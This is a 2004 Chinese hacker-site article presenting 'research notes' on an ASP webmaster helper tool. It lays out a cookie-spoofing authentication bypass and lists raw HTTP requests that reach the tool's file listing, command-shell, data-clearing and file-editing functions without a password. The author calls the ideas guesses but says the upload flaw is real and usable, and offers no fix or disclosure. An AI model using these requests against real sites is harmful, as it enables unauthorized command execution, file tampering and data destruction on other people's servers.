 |
  |
|
| 首页 | 技术文章 | 软件下载 | 博客 | 论坛 | 精品教程 | 黑客动画 | 视频资源 | 在线服务 | 黑客游戏 | | ||||
 |
|
|||||||
|
||||||||
|
|||||
| ASP站长助手漏洞研究手稿 | |||||
作者:HaK_BaN 文章来源:CnXHacker.Net 点击数: 更新时间:2004-10-15  |
|||||
|
继上传漏洞之后,开始着手研究关于其他功能参数的漏洞问题,思路如下: http://www.s****.com/enter.asp?showpath=yes 地址已经掩藏~ 文件列表参数地址。。。。。。如果在没有输入密码的情况下是不会显示列表信息的~ 所以进行了数据包的拦截~ GET /enter.asp?showpath=yes HTTP/1.1“利用GET的动作得到程序列出文件列表信息” Accept: */*没有任何的返回信息地址 Accept-Language: zh-cn Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; WHCC/0.6; TencentTraveler ; .NET CLR 1.1.4322) Host: www.s****.com Connection: Keep-Alive Cookie: iscookies=0; ASPSESSIONIDAQBSCARA=EFNMIHIANEJNGKAOCEGPJJFB “COOKIE信息和登陆前后没有任何的分别” 所以,我们大胆猜想程序可以利用COOKIE信息作为欺骗的对象,再利用程序的辅助,得到GET动作得到的信息 具体的思路就是:编写一个浏览器程序,加入各个不同的功能参数,利用预设的COOKIE信息进行欺骗,然后 得到我们需要的信息回显。 各个功能参数以及封包信息: CMDSHELL信息参数以及封包 GET /enter.asp?cmdshell=yes HTTP/1.1 Accept: */* Accept-Language: zh-cn Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; WHCC/0.6; TencentTraveler ; .NET CLR 1.1.4322) Host: www.s****.com Connection: Keep-Alive Cookie: iscookies=0; ASPSESSIONIDAQBSCARA=EFNMIHIANEJNGKAOCEGPJJFB 初始化功能信息参数以及封包 GET /enter.asp?cleardata=yes HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* Accept-Language: zh-cn Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; WHCC/0.6; TencentTraveler ; .NET CLR 1.1.4322) Host: www.s****.com Connection: Keep-Alive Cookie: iscookies=0; ASPSESSIONIDAQBSCARA=EFNMIHIANEJNGKAOCEGPJJFB 进入文件夹功能参数以及封包信息 GET /enter.asp?showpath=yes&path=地址 HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* Referer: http://www.s****.com/enter.asp?showpath=yes Accept-Language: zh-cn Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; WHCC/0.6; TencentTraveler ; .NET CLR 1.1.4322) Host: www.s****.com Connection: Keep-Alive Cookie: iscookies=0; ASPSESSIONIDAQBSCARA=EFNMIHIANEJNGKAOCEGPJJFB 编辑文件功能参数以及封包信息 GET /enter.asp?editpath=具体文件路径以及名称 HTTP/1.1 Accept: */* Accept-Language: zh-cn Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; WHCC/0.6; TencentTraveler ; .NET CLR 1.1.4322) Host: www.s****.com Connection: Keep-Alive Cookie: iscookies=0; ASPSESSIONIDAQBSCARA=EFNMIHIANEJNGKAOCEGPJJFB 以上为较为常用部分的功能参数以及封包信息资料~~~ 以上资料~~~均为本人白痴想法~~但是上传部分的漏洞确实存在,并且完全可以利用~ JuSt_FoR_FuN………………………………HaK_BaN |
|||||
| 文章录入:IceRiver 责任编辑:IceRiver | |||||
| 【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】 | |||||
| 最新热点 | 最新推荐 | 相关文章 | ||
| 微软终于让步 Vista SP1支持 MSN Space大赛官方网站入侵经 非主流入侵之会话劫持winnt/ 美耗资500万欲打造间谍版Mys Thomson SpeedTouch 2030 SI Asterisk 畸形 MIME 数据时有 插入ASP代码让网站数据库成木 微软补丁连发 XP SP3将于明年 Kaspersky Anti-Spam存在不安 MySpace存0day |
 网友评论:(只显示最新5条。评论内容只代表网友观点,与本站立场无关!) |
 |
|
| 关于我们 - 版权声明 - 帮助(?) - 广告服务 - 联系我们 - 友情链接 - 用户注册 - | Powered by ICE RIVER - STUDIO |
|
|
| » CnXHacker.CoM |  |
© CopyRight 2002-2006, CnXHacker.CoM™, Inc. All Rights Reserved. |
